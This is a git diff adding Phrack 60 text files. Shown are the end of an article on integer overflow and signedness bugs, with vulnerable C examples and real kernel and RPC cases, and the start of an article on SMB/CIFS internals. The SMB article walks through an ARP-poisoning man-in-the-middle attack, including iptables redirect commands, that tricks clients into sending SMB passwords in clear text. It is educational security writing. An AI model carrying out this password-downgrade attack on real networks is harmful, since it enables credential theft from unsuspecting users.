+            return -1;
+        }
+
+        return memcpy(kbuf, buf, len);  /* [2] */
+    }
+
+The problem here is that memcpy takes an unsigned int as the len parameter,
+but the bounds check performed before the memcpy is done using signed
+integers.  By passing a negative value for len, it is possible to pass the
+check at [1], but then in the call to memcpy at [2], len will be interpeted
+as a huge unsigned value, causing memory to be overwritten well past the
+end of the buffer kbuf.
+
+Another problem that can stem from signed/unsigned confusion occurs when
+arithmetic is performed.  Consider the following example:
+
+    int table[800];
+
+    int insert_in_table(int val, int pos){
+        if(pos > sizeof(table) / sizeof(int)){
+            return -1;
+        }
+
+        table[pos] = val;
+
+        return 0;
+    }
+
+Since the line
+    table[pos] = val;
+is equivalent to
+    *(table + (pos * sizeof(int))) = val;
+we can see that the problem here is that the code does not expect a
+negative operand for the addition: it expects (table + pos) to be greater
+than table, so providing a negative value for pos causes a situation which
+the program does not expect and can therefore not deal with.
+
+------[ 3.1.1 Exploiting
+
+This class of bug can be problematic to exploit, due to the fact that
+signed integers, when interpreted as unsigned, tend to be huge.  For
+example, -1 when represented in hexadecimal is 0xffffffff.  When
+interpreted as unsiged, this becomes the greatest value it is possible to
+represent in an integer (4,294,967,295), so if this value is passed to
+mempcpy as the len parameter (for example), memcpy will attempt to copy 4GB
+of data to the destination buffer.  Obviously this is likely to cause a
+segfault or, if not, to trash a large amount of the stack or heap.
+Sometimes it is possible to get around this problem by passing a very low
+value for the source address and hope, but this is not always possible.
+
+
+
+----[ 3.2 Signedness bugs caused by integer overflows
+
+Sometimes, it is possible to overflow an integer so that it wraps around to
+a negative number.  Since the application is unlikely to expect such a
+value, it may be possible to trigger a signedness bug as described above.
+
+An example of this type of bug could look like this:
+
+    int get_two_vars(int sock, char *out, int len){
+        char buf1[512], buf2[512];
+        unsigned int size1, size2;
+        int size;
+
+        if(recv(sock, buf1, sizeof(buf1), 0) < 0){
+            return -1;
+        }
+        if(recv(sock, buf2, sizeof(buf2), 0) < 0){
+            return -1;
+        }
+
+        /* packet begins with length information */
+        memcpy(&size1, buf1, sizeof(int));
+        memcpy(&size2, buf2, sizeof(int));
+
+        size = size1 + size2;       /* [1] */
+
+        if(size > len){             /* [2] */
+            return -1;
+        }
+
+        memcpy(out, buf1, size1);
+        memcpy(out + size1, buf2, size2);
+
+        return size;
+    }
+
+This example shows what can sometimes happen in network daemons, especially
+when length information is passed as part of the packet (in other words, it
+is supplied by an untrusted user).  The addition at [1], used to check that
+the data does not exceed the bounds of the output buffer, can be abused by
+setting size1 and size2 to values that will cause the size variable to wrap
+around to a negative value.  Example values could be:
+    size1 = 0x7fffffff
+    size2 = 0x7fffffff
+    (0x7fffffff + 0x7fffffff = 0xfffffffe (-2)).
+When this happens, the bounds check at [2] passes, and a lot more of the
+out buffer can be written to than was intended (in fact, arbitrary memory
+can be written to, as the (out + size1) dest parameter in the second memcpy
+call allows us to get to any location in memory).
+
+These bugs can be exploited in exactly the same way as regular signedness
+bugs and have the same problems associated with them - i.e. negative values
+translate to huge positive values, which can easily cause segfaults.
+
+
+
+--[ 4 Real world examples
+
+There are many real world applications containing integer overflows and
+signedness bugs, particularly network daemons and, frequently, in operating
+system kernels.
+
+----[ 4.1 Integer overflows
+
+This (non-exploitable) example was taken from a security module for linux.
+This code runs in the kernel context:
+
+    int rsbac_acl_sys_group(enum  rsbac_acl_group_syscall_type_t call,
+                            union rsbac_acl_group_syscall_arg_t arg)
+      {
+    ...
+        switch(call)
+          {
+            case ACLGS_get_group_members:
+              if(   (arg.get_group_members.maxnum <= 0) /* [A] */
+                 || !arg.get_group_members.group
+                )
+                {
+    ...
+                rsbac_uid_t * user_array;
+                rsbac_time_t * ttl_array;
+
+                user_array = vmalloc(sizeof(*user_array) *
+                arg.get_group_members.maxnum);   /* [B] */
+                if(!user_array)
+                  return -RSBAC_ENOMEM;
+                ttl_array = vmalloc(sizeof(*ttl_array) *
+                arg.get_group_members.maxnum); /* [C] */
+                if(!ttl_array)
+                  {
+                    vfree(user_array);
+                    return -RSBAC_ENOMEM;
+                  }
+
+                err =
+                rsbac_acl_get_group_members(arg.get_group_members.group,
+                                                  user_array,
+                                                  ttl_array,
+
+                                                  arg.get_group_members.max
+                                                  num);
+    ...
+    }
+
+In this example, the bounds checking at [A] is not sufficient to prevent
+the integer overflows at [B] and [C].  By passing a high enough (i.e.
+greater than 0xffffffff / 4) value for   arg.get_group_members.maxnum, we
+can cause the multiplications at [B] and [C] to overflow and force the
+buffers ttl_array and user_array to be smaller than the application
+expects.  Since rsbac_acl_get_group_members copies user controlled data
+to these buffers, it is possible to write past the end of the user_array
+and ttl_array buffers. In this case, the application used vmalloc() to
+allocate the buffers, so an attempt to write past the end of the buffers
+will simply raise an error, so it cannot be exploited.  Even so, it
+provides an example of what these bugs can look like in real code.
+
+Another example of a recent real world integer overflow vulnerability
+was the problem in the XDR RPC library (discovered by ISS X-Force). In this
+case, user supplied data was used in the calculation of the size of a
+dynamically allocated buffer which was filled with user supplied data.  The
+vulnerable code was this:
+
+    bool_t
+    xdr_array (xdrs, addrp, sizep, maxsize, elsize, elproc)
+         XDR *xdrs;
+         caddr_t *addrp;	/* array pointer */
+         u_int *sizep;		/* number of elements */
+         u_int maxsize;		/* max numberof elements */
+         u_int elsize;		/* size in bytes of each element */
+         xdrproc_t elproc;	/* xdr routine to handle each element */
+    {
+      u_int i;
+      caddr_t target = *addrp;
+      u_int c;		/* the actual element count */
+      bool_t stat = TRUE;
+      u_int nodesize;
+
+      ...
+
+      c = *sizep;
+      if ((c > maxsize) && (xdrs->x_op != XDR_FREE))
+        {
+          return FALSE;
+        }
+      nodesize = c * elsize;    /* [1] */
+
+      ...
+
+      *addrp = target = mem_alloc (nodesize);   /* [2] */
+
+      ...
+
+      for (i = 0; (i < c) && stat; i++)
+        {
+          stat = (*elproc) (xdrs, target, LASTUNSIGNED);   /* [3] */
+          target += elsize;
+        }
+
+As you can see, by supplying large values for elsize and c (sizep), it
+was possible to cause the multiplication at [1] to overflow and cause
+nodesize to be much smaller than the application expected.  Since
+nodesize was then used to allocate a buffer at [2], the buffer could be
+mis-sized leading to a heap overflow at [3].  For more information on this
+hole, see the CERT advisory listed in the appendix.
+
+
+----[ 4.2 Signedness bugs
+
+Recently, several signedness bugs were brought to light in the freebsd
+kernel.  These allowed large portions of kernel memory to be read by
+passing
+negative length paramters to various syscalls.  The getpeername(2) function
+had such a problem and looked like this:
+
+    static int
+    getpeername1(p, uap, compat)
+        struct proc *p;
+        register struct getpeername_args /* {
+            int	fdes;
+            caddr_t asa;
+            int	*alen;
+    } */ *uap;
+    int compat;
+    {
+        struct file *fp;
+        register struct socket *so;
+        struct sockaddr *sa;
+        int len, error;
+
+        ...
+
+        error = copyin((caddr_t)uap->alen, (caddr_t)&len, sizeof (len));
+        if (error) {
+            fdrop(fp, p);
+            return (error);
+        }
+
+        ...
+
+        len = MIN(len, sa->sa_len);    /* [1] */
+        error = copyout(sa, (caddr_t)uap->asa, (u_int)len);
+        if (error)
+            goto bad;
+    gotnothing:
+        error = copyout((caddr_t)&len, (caddr_t)uap->alen, sizeof (len));
+    bad:
+        if (sa)
+            FREE(sa, M_SONAME);
+        fdrop(fp, p);
+        return (error);
+    }
+
+This is a classic example of a signedness bug - the check at [1] did not
+take into account the fact that len could be negative, in which case the
+MIN macro would always return len.  When this negative len parameter was
+passed to copyout, it was interpretted as a huge positive integer which
+caused copyout to copy up to 4GB of kernel memory to user space.
+
+
+--[ Conclusion
+
+Integer overflows can be extremely dangerous, partly because it is
+impossible to detect them after they have happened.  If an integer overflow
+takes place, the application cannot know that the calculation it has
+performed is incorrect, and it will continue under the assumption that it
+is.  Even though they can be difficult to exploit, and frequently cannot be
+exploited at all, they can cause unepected behaviour, which is never a good
+thing in a secure system.
+
+
+--[ Appendix
+
+CERT advisory on the XDR bug:
+http://www.cert.org/advisories/CA-2002-25.html
+FreeBSD advisory: http://online.securityfocus.com/advisories/4407
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/11.txt b/phrack60/11.txt
new file mode 100644
index 0000000..1f45ebf
--- /dev/null
+++ b/phrack60/11.txt
@@ -0,0 +1,3101 @@
+               Volume 0x0b, Issue 0x3c, Phile #0x0b of 0x10
+
+|=---------------------=[ SMB/CIFS BY THE ROOT ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ ledin <ledin@encephalon-zero.com> ]=-----------------=|
+
+
+
+--[ Contents
+
+ 1 - Introduction
+ 
+ 2 - What is SMB/CIFS
+ 
+ 3 - Session establishment
+     How does a client establish a SMB session with a server ? 
+ 
+ 4 - Security level of SMB
+ 
+ 5 - Passwords
+ 
+ 6 - Description of several SMB packets
+ 
+   6.1 - The general aspect of a SMB packet
+   6.2 - NETBIOS and SMB
+   6.3 - The SMB base header
+   6.4 - Description of the most importants SMB commands
+   6.5 - How I can recover SMB passwords in clear from the network when 
+        they should be encrypted ?
+   6.6 - Man in the middle attack
+   6.7 - Notes about windows 2k/XP SMB operating over TCP 
+	
+ 7 - Transaction subprotocol and RAP commands 
+   
+   7.1 - RAP commands
+ 
+ 8 - Using RAP commands to list shares available on  a server
+   
+   8.1 - TconX packets
+   8.2 - Explanation of the RAP command "NetshareEnum"
+ 
+ 9 - Conclusion
+ 
+ 10 - References
+ 
+ 11 - Thanks 
+
+ Appendix A
+
+ Appendix B
+ 
+ 
+ 
+--[ 1 - Introduction
+
+
+   In this article, I will try to explain what CIFS and SMB are , how
+it works and some common insecurities present on these protocols.
+This article constitue  a useful source of knowledge about Microsoft 
+networking. The SMB protocol is one of the most used protocols on LAN.
+I have also included source code in the aim of giving a good expamle 
+of SMB operating.
+
+   You will learn how to use ARP poisoning to have password in clear 
+from the network when all SMB passwords are encrypted (without brute 
+forcing). You will be able to understand the link between SMB and 
+NETBIOS. You will also learn what is and how works the Microsoft 
+Remote Administration Protocol (RAP) for scanning remote shares on a
+SMB server.
+
+   Programs and information are given for educational purpose only. 
+I could be not responsable of what you will make with.
+
+--[ 2 - What is SMB/CIFS ?
+
+
+According to Microsoft CIFS is intended to provide an open cross-
+platform mechanism for client systems to request file and print 
+services from server systems over a network. It is based on the
+standard Server Message Block (SMB) protocol widely in use by 
+personal computers and workstations running a wide variety of 
+operating systems.
+
+In fact, SMB (for Server Message Block) is a protocol which operates
+the data transfert between sharing files, devices, named pipes 
+or mail slot across a network. CIFS is a public version of SMB.
+
+SMB clients available :
+
+ from Microsoft : Windows 95, Windows for workgroups 3.x, 
+ Windows NT,2000 and XP
+
+ for Linux :
+ Smblient from Samba
+ Smbfs for Linux
+
+SMB servers :
+ Samba
+ Microsoft Windows for Workgroups 3.x
+ Microsoft Windows 95
+ Microsoft Windows NT 
+ The PATHWORKS family of servers from Digital
+ LAN Manager for OS/2,SCO,etc
+ VisionFS from SCO
+ TotalNET Advanced Server from Syntax
+ Advanced Serverfor UNIX from AT&T (NCR?)
+ LAN Server for OS/2 from IBM.
+
+--[ 3 - Session establishment
+
+
+   Note : SMB protocol was developed to run on DOS ( powered by an 
+Intel chip) so byte ordering is little-endian the opposite of network
+ ordering.
+
+   SMB can run over TCP/IP, NetBEUI, DECnet Protocol and IPX/SPX. 
+With a SMB implementation over TCP/IP, DECnet or NETBEUI, the 
+NETBIOS names must be use.
+
+   I will explain in the sixth chapter what NETBIOS is. But for the 
+moment, you just have to know that a NETBIOS name identifies one computer
+on a Microsoft network.
+
+   The development of SMB has begun in the eighties, so there is a lot
+of versions of the SMB protocol. But the most used (on Windows 95, 
+98, Windows NT, Windows 2000 and XP) is the NT LM 0.12 
+version. This article is based on the NT LM 0.12 version.
+
+   You have to know that a SMB Domain name identifies a group of 
+ressource (users, printers, files ..) on a SMB server.
+
+How does a client establish a SMB session with a server ?
+
+
+   Let's take this situation : a client  wants to access to a specific
+ressource on a server.
+
+1 - To begin the client requests the server for a NETBIOS session. 
+The client sends his encoded NETBIOS name to the SMB server 
+(which listening connection requests on port 139). 
+The server receives the NETBIOS name and replies with a NETBIOS 
+session packet to valid the session. The client enters after in a 
+SMB session establishment i.e the identification of the client 
+to the SMB server.
+
+2 - The client sends a SMB negprot request packet (negprot for 
+"negotiate protocol"). The client gives a list of SMB protocol 
+versions supported.
+Then the server sends a SMB negprot reply packet (with informations 
+like SMB domain name, maximun connections accepted, 
+SMB protocol versions supported ...)
+
+3 - After the negotiation of protocols, the client processes to a user
+or share identification on the server.(see the next chapter to know 
+ what is the difference between a share and a user identification)
+
+This process is operated by the SesssetupX request packet (SesssetupX 
+for Session Setup and X).
+The client sends a couple login/password or a simple password to the 
+server that refuses or allows the conection with a SessetupX reply 
+packet.
+
+4 - Ok, when the client has finished with negotiation and identification
+it sends a tconX packet for specifying the network name of the ressource
+that it wants to access, and the server sends a Tconx reply indicating 
+if the connection is accepted or not.
+
+
+
+
+                                 netbios session request 
+                                      (netbios name)
+              [client]       --------------------------->   [server]
+1)
+                                 netbios session granted
+	      [client]       <--------------------------    [server]
+	      
+	  
+
+                                  SMB negprot request
+              [client]       --------------------------->   [server]
+2)
+                                  SMB negprot reply
+              [client]       <--------------------------    [server]
+	      
+	      
+
+                                SMB sesssetupX request
+              [client]       --------------------------->   [server]
+3)
+                                 SMB sesssetupX reply
+              [client]       <--------------------------    [server]
+	      
+
+                                 SMB TconX request
+              [client]       --------------------------->   [server]
+4)
+                                 SMB TconX reply
+              [client]       <--------------------------    [server]
+	      
+	      
+A complete description of each packets is given in the chapter six.
+
+
+--[ 4 - Security level of SMB 
+ 
+
+There is two types of security models on SMB :
+
+   The first is  the "Share level" security model. This security model
+associates a password to a shared ressource on the network. The user 
+logs to this ressource (IPC, Disk, Printers) with the correct password.
+The user is anyone on the network who knows the name of the server where 
+the ressource is.
+
+   The second is the "User Level". This security model is an enhanced
+implementation of the first. It consists to associate a couple of 
+login/password to a shared ressource. So if a person wants to 
+connect to this shared ressource, he has to know the login/password 
+couple. This security level is useful to know who makes what.
+
+
+--[ 5 - Passwords
+
+
+   With SMB, when you have to make an identification on a server, your
+password could be sent in clear or encrypted. If the server supports
+encryption, the client will have to answer a challenge. The server
+knows the password, so in the negprot reply packet, an encryption key
+will be send to the client. The client encrypts the password,
+and sends it in the SesssetupX request packet, the server verifies the
+validity of the password and allows the session or not.
+
+You have to know that a SMB password (not encrypted) is 14 bytes 
+long maximum. The size of the encryption key is usually 8 bytes long.
+The size of the encrypted password is 24 bytes. With ANSI password, the
+characters of the password are converted in upper case for the 
+encryption.
+
+The password is encrypted with a DES encryption in block mode.
+
+
+--[6 - Description of several SMB packets
+
+
+   In this part I will give the description of the most important 
+packets types involved in SMB protocol. I know it's a bit boring 
+but this is the base to understand how works SMB and the attacks.
+I will explain what is very important in each type of packet.
+For each type of command correspond two types of packets. The request 
+packet and the reply packet.
+
+----[ 6.1 - The general aspect of a SMB packet.
+
+
+   In the majority of case SMB runs over TCP/IP protocol suite. 
+So let's consider that SMB runs over TCP layer for us. Over the TCP 
+layer, you will always find the NETBIOS (NBT) header. Over NBT you 
+have the SMB base header. Over the SMB base header, you have an 
+another type of header, which depends of the specific command you 
+request.
+
+                    ----------------------
+                    |      TCP header    |
+                    ----------------------
+                    |   NETBIOS header   |
+                    ----------------------
+                    |   SMB base header  |
+                    ----------------------
+                    | SMB Command header |
+                    ----------------------
+                    |        DATA        |
+                    ----------------------
+			      
+The "SMB Base header" contains several informations, like the size of 
+reception buffers, maximum connexions allowed... It also contains a 
+number that identifies the command requested. 
+
+"SMB command header" is a header with all the parameters for the 
+requested command (a command like negotiate protocol versions ... )
+
+"DATA" is the data for the requested command.
+
+I call "SMB packet", the NETBIOS Header + the SMB base header +
+the SMB Command header + DATA.
+
+NOTE :  I will use this definitions :
+
+typedef unsigned char UCHAR;          // 8 unsigned bits
+typedef unsigned short USHORT;        // 16 unsigned bits
+typedef unsigned long ULONG;          // 32 unsigned bits
+
+and STRING defined a null terminated ASCII string. 
+
+
+----[ 6.2 - NETBIOS and SMB
+
+
+NETBIOS (for NETwork Basic Input and Outpout System) is widely use 
+on Microsoft networks. It is a sofware interface and a naming system.
+Each computer has a NETBIOS name, which is 15 characters long, and a 
+sixteenth character is used to identify the type of computer 
+( Domain Name server, workstation...).
+
+Value for the sixteenth character :
+
+0x00 base computer, workstation.
+0x20 resource sharing server.
+
+There are other values but these are the most interessant for us. The 
+first (0x00) identify a workstation and the second (0x20) the server. 
+
+On a SMB packet, the NETBIOS header corresponds to the NETBIOS 
+Session header, defined like this :
+ 
+                UCHAR Type;   	// Type of the packet
+                UCHAR Flags;  	// Flags
+                USHORT Length;	// Count of data bytes (netbios header
+                                                        not included)
+	      
+For the "Flags" field, the value is always 0. (with SMB, not in general !)
+
+For the "Type" field, several values are possible :
+
+               0x81 corresponds to a NETBIOS session request. This code
+is used when the client sends its NETBIOS name to the server.
+
+               0x82 is a positive response to a NETBIOS session request.
+This code is used by the server to authorize a NETBIOS session. 
+
+               0x00 correspond to a session message. This code is always 
+used in a SMB session i.e when the client has sent his NETBIOS name to 
+the server and has received a positive reply.	       
+	       
+The "Length" field contains a count of data bytes (The netbios header 
+is not included), "data" means what is above the NETBIOS header (it 
+could be the SMB Base header + SMB Command header + DATA or NETBIOS 
+names). 
+
+NETBIOS names and encoding
+
+
+A NETBIOS encoded name is 32 bytes long.
+
+A NETBIOS name is always given in upper case characters.
+
+It's very easy to encode a NETBIOS name. For example the NETBIOS name 
+of my computer is "BILL" and it's a workstation so there is a "0x00"
+for the sixteenth character.
+
+Firstly, when a NETBIOS name is shorter than 15 bytes, it may be padded
+on the right with spaces.
+
+     "BILL           "      
+
+In hexadecimal  0x42 0x49 0x4c 0x4c 0x20 0x20 ......0x00
+
+Each bytes are splited into 4-bit halves.
+
+0x4 0x2 0x4 0x9 0x4 0xc 0x4 0xc 0x2 0x0 .......
+
+And each 4-bit half is added to the ASCII value of the 'A' letter (0x41)
+
+0x4 + 0x41 = 0x45  -> ASCII value = E
+
+0x2 + 0x41 = 0x43  -> ASCII value = C
+...
+
+And you have the encoded NETBIOS name which is 32 bytes long.
+
+Note :
+
+ SMB can run directly over TCP without NBT (it's supported on Win2k 
+and XP on port 445). The NETBIOS name are not limited to 15 characters. 
+
+You don't need to know more, if you want to have more information 
+about NETBIOS read [3] and [4].
+
+----[ 6.3 - The SMB base header    
+
+
+This header is used in all SMB packets, this is its definition :
+
+    UCHAR Protocol[4];                // Contains 0xFF,'SMB'
+    UCHAR Command;                    // Command code
+    union {
+        struct {
+            UCHAR ErrorClass;         // Error class
+            UCHAR Reserved;           // Reserved for future use
+            USHORT Error;             // Error code
+        } DosError;
+        ULONG Status;                 // 32-bit error code
+    } Status;
+    UCHAR Flags;                      // Flags
+    USHORT Flags2;                    // More flags
+    union {
+        USHORT Pad[6];                // Ensure section is 12 bytes long
+        struct {
+            USHORT PidHigh;           // High part of PID
+            ULONG  Unused;            // Not used
+            ULONG  Unused2;
+    } Extra;
+    };
+    USHORT Tid;                       // Tree identifier
+    USHORT Pid;                       // Caller's process id
+    USHORT Uid;                       // Unauthenticated user id
+    USHORT Mid;                       // multiplex id
+    UCHAR  WordCount;                 // Count of parameter words
+    USHORT ParameterWords[ WordCount ];    // The parameter words
+    USHORT ByteCount;                 // Count of bytes
+    UCHAR  Buffer[ ByteCount ];       // The bytes
+
+
+The "Protocol" field contains the name of the protocol (SMB) with a 
+0xFF before.
+
+The "Command" field contains the value of the requested command. For 
+example 0x72 is for the "negotiate protocol" command.
+ 
+The "Tid" field is used when the client is successfully connected to a
+ressource on a SMB server . The TID number identifies this ressource.
+
+The "Pid" field is used when the client has successfully created a 
+process on the server. The PID number identifies this process.
+
+The "Uid" field is used when a user is successfully authenticated 
+on a server. The UID number identify this user.
+
+The "Mid" field is used in couple with the PID when a client has 
+several requests on the server ( process, threads, file acess...).
+
+The "Flags2" field is also important, when the bit 15 is armed, the 
+strings are UNICODE strings .  
+
+
+
+----[ 6.4 - Description of the most importants SMB commands
+
+
+ SMB negotiate Protocol (negprot)
+ 
+   The Negotiate Protocol Command is used in the first step of the SMB 
+session establishment.
+
+The Command code for the field "Command" in the SMB Base header is : 0x72.
+
+Here is the description of the negprot request and reply headers : 
+
+  Request header
+    
+ UCHAR WordCount;              Count of parameter words = 0
+ USHORT ByteCount;             Count of data bytes
+ struct {
+   UCHAR BufferFormat;        0x02 -- Dialect
+   UCHAR DialectName[];       ASCII null-terminated string
+ } Dialects[];
+
+   This packet is sent by the client to give the server its list of 
+SMB protocol versions supported.
+
+   Just three things to say, for this packets, "WordCount" field is 
+always set to zero, "ByteCount" field is equal to the size of the 
+"Dialects" structure, the field "BufferFormat of "Dialects" is always
+equal to 0x02.
+
+   The "DialectName" string contains the name of the several SMB 
+protocol versions supported by the client.    
+ 
+  Reply header
+    
+ UCHAR WordCount;           Count of parameter words = 17
+ USHORT DialectIndex;       Index of selected dialect
+ UCHAR SecurityMode;        Security mode:
+                            bit 0: 0 = share, 1 = user
+                            bit 1: 1 = encrypt passwords
+ USHORT MaxMpxCount;        Max pending multiplexed requests
+ USHORT MaxNumberVcs;       Max VCs between client and server
+ ULONG MaxBufferSize;       Max transmit buffer size
+ ULONG MaxRawSize;          Maximum raw buffer size
+ ULONG SessionKey;          Unique token identifying this session
+ ULONG Capabilities;        Server capabilities
+ ULONG SystemTimeLow;       System (UTC) time of the server (low).
+ ULONG SystemTimeHigh;      System (UTC) time of the server (high).
+ USHORT ServerTimeZone;     Time zone of server (min from UTC)
+ UCHAR EncryptionKeyLength; Length of encryption key.
+ USHORT ByteCount;          Count of data bytes
+ UCHAR EncryptionKey[];     The challenge encryption key
+ UCHAR OemDomainName[];     The name of the domain (in OEM chars)
+
+
+This packet is sent by the server to give the client the list 
+of SMB protocol versions supported, the SMB domain name of the server 
+and an encryption key if necessary. 
+ 
+IMPORTANT  :
+ 
+The first interessant field is the "SecurityMode" byte. If the bit 0 
+is armed we have a user security level. If it's not, we have a 
+share security level. If the bit 1 is armed the password is encrypted
+with a DES encryption in block mode.
+
+The "SessionKey" field is used to identify the session . There is one 
+single session key for one session.
+ 
+The "Capabilities" field indicates if the server supported UNICODE 
+strings or NT LM 0.12 particular commands ...
+ 
+The datas are at the end of the header. With a negprot reply, 
+these datas corespond to the strings "EncryptionKey" and 
+"OemDomainName".
+
+The length of these two strings together is given by the "Bytecount" 
+field.
+ 
+The length of the "EncrytionKey" string is given by the field 
+"EncryptionKeyLength". The "EncryptionKey" string contains the Key for
+the encryption of the password.
+
+The length of "OemDomainName" is given by 
+     (Bytecount - EncryptionKeyLength). 
+The "OemDomainName" string contains the SMB domain name of the server
+(in OEM chars).
+
+
+ Session setup and X
+  
+   The Session Setup and X packets (SesssetupX or setupx for 
+abbrevation) are used to deal with the identity of a user or when you
+have to give a password to acess a ressource. 
+
+   The Command code for the Session Setup and X command is 0x73.
+
+  Request header
+  
+ UCHAR WordCount;               Count of parameter words = 13
+ UCHAR AndXCommand;             Secondary (X) command;  0xFF = none
+ UCHAR AndXReserved;            Reserved (must be 0)
+ USHORT AndXOffset;             Offset to next command WordCount
+ USHORT MaxBufferSize;          Client's maximum buffer size
+ USHORT MaxMpxCount;            Actual maximum multiplexed pending
+                                requests
+ USHORT VcNumber;               0 = first (only), nonzero=additional
+                                VC number
+ ULONG SessionKey;              Session key (valid iff VcNumber != 0)
+ USHORT                         Account password size, ANSI
+ CaseInsensitivePasswordLength;
+ USHORT                         Account password size, Unicode
+ CaseSensitivePasswordLength;
+ ULONG Reserved;                must be 0
+ ULONG Capabilities;            Client capabilities
+ USHORT ByteCount;              Count of data bytes;    min = 0
+ UCHAR                          Account Password, ANSI
+ CaseInsensitivePassword[];
+ UCHAR CaseSensitivePassword[]; Account Password, Unicode
+ STRING AccountName[];          Account Name, Unicode
+ STRING PrimaryDomain[];        Client's primary domain, Unicode
+ STRING NativeOS[];             Client's native operating system,
+                                Unicode
+ STRING NativeLanMan[];         Client's native LAN Manager type,
+                                Unicode
+
+This packet gives a lot of information about the client's system.
+
+The field "MaxBufferSize" is very important, it gives the maximun 
+size of data that the client can receive. If you set it to zero 
+you will not receive any type of data from the server.
+ 
+For the data, you have several strings. The most important are 
+"CaseSensitivePassword" (password in UNICODE characters)
+and "CaseInsensitivePassword" (password in ANSI characters).
+
+One of both is used, it depends if the server is supporting UNICODE
+strings or not (see negatiate protocol reply packet description). 
+The length of the password is given in the fields 
+"CaseInsensitivePasswordLength" or in
+"CaseSensitivePasswordLength" .
+
+For the other strings, see the description. The count of data bytes
+is given by the "Bytecount" field.
+
+ 
+  Reply header
+  
+ UCHAR WordCount;                   Count of parameter words = 3
+ UCHAR AndXCommand;                 Secondary (X) command;  0xFF =
+                                    none
+ UCHAR AndXReserved;                Reserved (must be 0)
+ USHORT AndXOffset;                 Offset to next command WordCount
+ USHORT Action;                     Request mode:
+                                    bit0 = logged in as GUEST
+ USHORT ByteCount;                  Count of data bytes
+ STRING NativeOS[];                 Server's native operating system
+ STRING NativeLanMan[];             Server's native LAN Manager type
+ STRING PrimaryDomain[];            Server's primary domain
+
+Again, there are a lot of information on this packet : OS Type,
+version of the SMB server software running on server and DomainName.
+
+If the connection failed, there is nothing for NativeOS, NativeLanman
+and PrimaryDomain strings.
+
+OK I have finished with the "hard" part, we can play a little with 
+the SMB protocol.
+
+If you want to learn more about it, read [1].
+
+
+----[ 6.5 - How I can recover SMB passwords in clear from the network 
+            when they should be encrypted 
+
+
+   During the session establishment, the password is sent to the server
+during the SMB setupx Session. The SMB negprot reply packet contains 
+a bit in the "SecurityMode" field which allows password encryption 
+or not.
+
+   So if you want to have a password in clear when all is encrypted, you
+have two possibilities.
+
+   The first one is to catch the encryption key and the encrypted 
+password and brute force it ! It can be very long ...
+
+	Some programs like LophtCrack (with SMBGrinder), dsniff or readsmb2 
+sniff SMB encrypted passwords.
+
+   The second way is to hijack the connection and to make the client 
+believe that the password should not be encrypted.
+
+   This technic is a bit complex to explain, but I will say how to 
+do it !
+
+   If the server is configured to encrypt password, the SMB negprot 
+reply packet has the bit 1 of the "SecurityMode" field armed. But if 
+an attacker sends a negprot reply packet with this bit equal to 
+zero before the server, the password will be in clear in the 
+SessetupX request packet .
+
+
+                   negprot request 
+  [client]     ------------------------>         [server]
+
+                [attacker waits for a negprot request]
+
+  [client]   <-------------|                     [server]
+                           | fake negprot reply
+                           |
+                [attacker sends his fake neprot reply]
+
+
+                  real negprot reply
+  [client]   <----------------------------------  [server]
+
+
+                [attacker (does nothing)]
+
+
+               sessetupX request with the password in clear text
+  [client]    ----------------------------------> [server]
+
+                [attacker sniffs the password in clear text]
+
+
+These diagrams illustrate a direct packet injection on the network.
+In majority of case, this method doesn't work because the fake
+negprot reply could treated after the real. There is also other 
+problems, session failures, validity of password, does not work
+in a switched environment...
+We can avoid all of these problems by using Arp-Poisoning.
+
+I will not explain and describe what is ARP-Poisoning, you could find a 
+lot of docs about it on internet . But, if you don't know what it is, 
+you just have to know that this attack allow the attacker to redirect 
+and modify the traffic between the server and the client.
+
+If you consider this situation, the attacker is between the both.
+
+He is the man in the middle ...
+
+
+----[ 6.6 - Man in the middle attack
+
+
+          "Attack where your enemy is not expecting you"
+                  
+                                 Sun Tzu, "The art of war"
+
+Now I will describe the man in the middle attack. This attack allow 
+you to bypass switches, to avoid connection failures and to grab the 
+password in clear.
+
+Let's consider that the traffic between the client and the server 
+is redirected by the attacker ( thanks to ARP poisoning !).
+The client requests a SMB session to the server. 
+The client will send packets to the SMB port (139) of the server. The 
+attacker receives them. But the attacker doesn't redirect the packet to
+the server. 
+The whole incoming traffic to the server's SMB port (so to the attacker's 
+machine) is redirected on the local port 1139 of the attacker (very easy 
+to do with NAT and iptables).
+The whole traffic (not only SMB) is redirected also with iptables and 
+NAT. 
+On the port 1139, there is a program (a transparent proxy program) that 
+assumes the modification and redirection of the SMB packets.
+
+
+The two iptables/NAT commands are :
+
+To redirect the incoming traffic (on port 139 ) to a local port (1139 for
+example).
+
+#iptables -t nat -A PREROUTING -i eth0 -p tcp -s 192.168.1.3 \
+--dport 139 -j REDIRECT --to-port 1139
+
+192.168.1.3 is the IP address of the client 
+
+To redirect the whole traffic
+
+#iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
+
+What are the modifications ? :
+
+The attacker modifies the negprot reply to have password in
+clear text. The attacker recovers also the encryption key.
+The attacker set to zero the value of the length of the encryption 
+key and put the domain name instead of the encryption key. 
+He sets the encryption bit of the "SecurityMode" field to 0. 
+With this, the password will not be encrypted.
+
+The client will send the password in clear in a sesssetupx request. 
+When the attacker has the password, he encrypts it with the encryption
+key recovered before and sends the sesssetupx request (with 
+the encrypted password) to the server.
+
+The server sends a sesssetupx reply to accept or refuse the session.
+The attacker redirects the sesssetupx reply and the whole traffic 
+after.
+
+The session will not fail and nobody has saw our man in the middle !.
+
+
+Description :
+
+
+           ARP-P                  ARP-P
+[client] <---------  [attacker]  ---------> [server]
+
+The attacker processes to a ARP Poisoning attack to redirect the whole
+traffic between the two machines.
+
+
+
+[client] <---------> [attacker] <---------> [server]
+ 
+
+The traffic redirection is operated with NAT and iptables.
+
+
+
+            port 139
+[client] -----------------> [attacker]        [server]
+
+The attacker receives the first packet to the SMB server port.
+
+
+
+
+[client]  ----------------->[attacker 139]        [server]
+                                |
+                                V
+                            [attacker 1139]
+
+The attacker redirects it to the port 1139.
+On the port 1139, our proxy program is listening. 
+
+
+
+          negprot request
+[client] -----------------> [attacker]        [server]
+
+The attacker receives the negprot request.
+
+
+
+                                     negprot request
+[client]                   [attacker]---------------> [server]
+
+The attacker redirects directly the negprot request to the server.
+
+
+                                     negprot reply
+[client]         [attacker] <----------------------------    [server]
+                                 (encryption bit set
+                              to have password encrypted)
+
+The server replies with a negprot reply with the encryption 
+bit set to have the password encrypted. The attacker doesn't
